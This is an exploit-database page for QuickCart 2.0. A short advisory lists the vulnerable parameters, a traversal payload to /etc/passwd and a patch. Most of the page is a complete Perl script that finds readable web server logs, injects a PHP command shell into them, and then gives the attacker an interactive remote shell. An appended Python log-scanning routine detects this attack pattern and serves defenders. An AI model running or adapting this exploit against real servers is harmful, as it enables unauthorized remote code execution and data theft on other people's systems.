0day.today - Biggest Exploit Database in the World.
QuickCart 2.0 (categories.php) Local File Inclusion Exploit
===========================================================

#################################################################################################
# r0ut3r Presents...
#
# Another r0ut3r discovery!
#
# QuickCart 2.0 Local File Inclusion Exploit
#################################################################################################
# Software: QuickCart 2.0
#
# Vendor: http://opensolution.org/
#
# Released: 2006/12/03
#
# Critical: Moderately critical
#
# Note: The information provided in this document is for Quick Cart administrator
# testing purposes only!
#
# register_globals must be on
# gpc_magic_quotes must be off
#
# actions_admin/categories.php?config[db_type]=
# actions_admin/couriers.php?config[db_type]=
# actions_admin/orders.php?config[db_type]=
# actions_admin/products.php?config[db_type]=
# actions_client/products.php?config[db_type]=
# actions_client/orders.php?config[db_type]=
#
# Vulnerable code:
# require_once DIR_CORE.'couriers-'.$config['db_type'].'.php';
#
# Patch: (Place this code at the top of every file)
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))
#     die();
#
# Exploit: categories.php?config[db_type]=../../../../../../../../../../../etc/passwd%00
# Usage: perl localfilexpl.pl 127.0.0.1 actions_admin/categories.php?config[db_type]=
#################################################################################################

############################################################################
# Local File Inclusion Exploiter
#
# This script attempts to exploit a local file include vulnerability
# by finding a readable http log file, then by sending a specially crafted
# http request to the server in order to insert a PHP Shell into the
# log files. A shell is then spawned.
#
# Created By r0ut3r (writ3r [at] gmail.com)
############################################################################

use IO::Socket;
use Switch;

$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$vulnf = @ARGV[1]; # /include/WBmap.php?l=
$opt = @ARGV[2]; # -p (not needed)

sub Header()
{
    print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at] gmail.com)
-------------------------------------------------------------------
};
}

sub Usage()
{
    print q {Usage: localfilexpl.pl [target] [folder & vulnerable file] [opt]
Example: localfilexpl.pl localhost /include/WBmap.php?l= -p
opt = -p (To print recieved content)
};
    exit();
}

Header();

if (!$target || !$vulnf) {
    Usage();
}

@targets = (
    "var/log/httpd/access_log",
    "var/log/httpd/error_log",
    "var/log/access_log",
    "var/log/error_log",
    "var/www/logs/access.log",
    "var/www/logs/access_log",
    "var/www/logs/error_log",
    "var/www/logs/error.log",
    "apache/logs/access_log",
    "apache/logs/error.log",
    "etc/httpd/logs/access.log",
    "etc/httpd/logs/access_log",
    "etc/httpd/logs/error.log",
    "etc/httpd/logs/error_log",
    "usr/local/apache/logs/access.log",
    "usr/local/apache/logs/access_log",
    "usr/local/apache/logs/error.log",
    "usr/local/apache/logs/error_log",
    "var/log/apache2/error_log",
    "var/log/apache2/error.log",
    "var/log/apache2/access_log",
    "var/log/apache2/access.log",
    "access_log",
);

@paths = ();
$dirs = 5;
$count = 0;

foreach $target (@targets)
{
    for(0..$dirs){ $paths[$count+$_] = "../"x$_ . $target; }
    $count += $dirs;
}

print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
    #print "$path\n";
    $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
    print $sock "GET ".$vulnf.$path."%00 HTTP/1.1\n";
    print $sock "Host: $target\n";
    print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
    print $sock "Accept: text/html\n";
    print $sock "Connection: close\n\n\r\n";

    while (<$sock>)
    {
        if (/<title>404 Not Found/) { print "[-] Vulnerable file not found! Exiting... \n"; exit(); }
        if (/Permission denied/) { print "[-] Log file found, but permission was denied to read file. [".$path."] \n"; }
        if (/(.*?).(.*?).(.*?).(.*?) - - \[(.*?)/)
        {
            if ($path ne $log) { print "[+] Log file found! [".$path."] \n"; }
            $log = $path;
        }
    }
}

if ($log eq "") { print "[-] Log file not found. Exiting...\n"; exit(); }

$cmdfunct = "system";

print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";

@cmdfunctions = ("exec", "shell_exec", "passthru");
$enabled_funct = false;

$xpl_test = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl_test "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
print $xpl_test "Host: $target\n";
print $xpl_test "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl_test "Accept: text/html\n";
print $xpl_test "Connection: close\n\n\r\n";

while (<$xpl_test>)
{
    if (/system\(\) has been disabled for security/)
    {
        print "[-] system() function is disabled. \n";
        foreach $cmdfunct (@cmdfunctions)
        {
            if ($enabled_funct eq false)
            {
                print "[+] Trying ".$cmdfunct."()\n";
                $code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
                $xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
                print $xpl "GET /".$code." HTTP/1.1\n";
                print $xpl "Host: $target\n";
                print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
                print $xpl "Accept: text/html\n";
                print $xpl "Connection: close\n\n\r\n";

                $xpl_retry = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
                print $xpl_retry "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
                print $xpl_retry "Host: $target\n";
                print $xpl_retry "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
                print $xpl_retry "Accept: text/html\n";
                print $xpl_retry "Connection: close\n\n\r\n";

                while (<$xpl_retry>)
                {
                    if (/b>: $cmdfunct\(\) has been disabled for security reasons/)
                    {
                        print "[-] ".$cmdfunct."() function is disabled. \n";
                        $enabled_funct = false;
                        last;
                    }
                    else
                    {
                        $enabled_funct = true;
                    }
                }

                if ($enabled_funct eq true) { print "[+] Enabled function found! [".$cmdfunct."]\n"; break; }
            }
        }

        if ($enabled_funct eq false) { print "[-] No enabled cmd function found. Tried system(), exec(), shell_exec(), passthru()\n"; exit(); }
    }
}

print "[!] Command execution at: http://".$target.$vulnf.$log."%00\n";
print "[+] Creating shell - Type 'exit' to quit\n";

print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;

while ($cmd !~ "exit")
{
    $scmd = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
    print $scmd "GET ".$vulnf.$path.$log."%00&cmd=".substr($cmd, 0, -1)." HTTP/1.1\n";
    print $scmd "Host: $target\n";
    print $scmd "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
    print $scmd "Accept: text/html\n";
    print $scmd "Connection: close\n\n\r\n";

    # prints output from command execution
    if ($opt eq "-p") { while (<$scmd>) { print <$scmd>; } }

    print "[cmd]\$ ";
    $cmd = <STDIN>;
    $cmd =~ s/ /%20/g;
}

# 0day.today [2024-11-16] #
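
A defender-side check for the request pattern this advisory describes, added here as an example (it is not part of the original advisory or of QuickCart): it scans web access-log lines for `config[db_type]` passed in the URL to the listed scripts, and for PHP tags written into a request line, then groups the findings per client. The Apache common log format, the finding names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Script names are the ones listed in the advisory; the regex itself is an assumption.
QC_SCRIPTS = re.compile(
    r"/actions_(?:admin|client)/(?:categories|couriers|orders|products)\.php", re.I)
# Apache common log format (assumed): ip ident user [time] "request" status size
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<req>.*)" (?P<status>\d{3}) \S+')

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [03/Dec/2006:10:00:01 +0000] "GET /index.php?p=productsList HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Dec/2006:10:02:11 +0000] "GET /actions_admin/categories.php?config[db_type]=../../../var/log/httpd/access_log%00 HTTP/1.1" 200 812',
    '203.0.113.9 - - [03/Dec/2006:10:02:12 +0000] "GET /<?php echo 1; ?> HTTP/1.1" 404 209',
    '192.0.2.44 - - [03/Dec/2006:10:05:40 +0000] "GET /actions_client/orders.php?config%5Bdb_type%5D=mysql HTTP/1.1" 200 0',
]

def classify(line):
    """Return (client_ip, findings) for one log line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    req = m.group("req")
    for _ in range(2):              # decode twice to catch %2500-style double encoding
        req = unquote(req)
    findings = set()
    # config[db_type] is set by the application, never by a legitimate URL.
    if QC_SCRIPTS.search(req) and "config[db_type]" in req.lower():
        findings.add("db_type-override")
        if "../" in req or "..\\" in req:
            findings.add("traversal")
        if "\x00" in req:
            findings.add("null-byte")
    if "<?" in req:                 # PHP open tag placed in the logged request line
        findings.add("php-in-request")
    return m.group("ip"), findings

def triage(lines):
    """Per client: 'log-poisoning-chain' if it both wrote PHP into the log and
    sent a traversal through config[db_type]; otherwise 'probe'."""
    per_ip = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            per_ip.setdefault(parsed[0], set()).update(parsed[1])
    report = {}
    for ip, found in per_ip.items():
        chain = {"php-in-request", "traversal"} <= found
        report[ip] = ("log-poisoning-chain" if chain else "probe", sorted(found))
    return report
```

Calling `triage(SAMPLE)` reports 203.0.113.9 as the full chain and 192.0.2.44 as a probe; the ordinary storefront request produces no entry.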